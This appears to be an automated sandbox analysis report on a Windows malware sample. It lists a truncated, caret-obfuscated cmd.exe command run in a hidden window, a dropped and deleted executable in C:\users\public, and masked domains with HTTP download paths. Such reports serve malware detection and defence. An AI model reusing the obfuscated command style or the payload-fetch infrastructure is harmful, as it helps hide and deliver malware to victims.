Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' qTcGcWKFYmXTo FflnzhNFoTUMAMASPijWbXwLFRn nIDWcvwDJEXb & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qNOoUjcCjRztQbh%=IianIkFz&&set %RjkPobalmpO%=p&&set %IwjIzQ...
Modifies file system
Creates the following files
- C:\users\public\253786.exe
Deletes the following files
- C:\users\public\253786.exe
Network activity
Connects to
- 'bu##k.me.uk':80
- 'di###sgang.com':80
- 'br##m.de':80
- 'ea##data.gr':80
- 'ea##data.gr':443
- 'ba##no.com':80
- 'hu###omains.com':443
TCP
HTTP GET requests
- http://bu##k.me.uk/rsVS/
- http://di###sgang.com/yZCLTO/
- http://br##m.de/3x2c/
- http://ea##data.gr/szTMNv/
- http://ba##no.com/3J6mS/
Other
- 'ea##data.gr':443
- 'hu###omains.com':443
UDP
- DNS ASK bu##k.me.uk
- DNS ASK di###sgang.com
- DNS ASK br##m.de
- DNS ASK ea##data.gr
- DNS ASK ba##no.com
- DNS ASK hu###omains.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' qTcGcWKFYmXTo FflnzhNFoTUMAMASPijWbXwLFRn nIDWcvwDJEXb & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qNOoUjcCjRztQbh%=IianIkFz&&set %RjkPobalmpO%=p&&set %IwjIzQ...' (with hidden window)
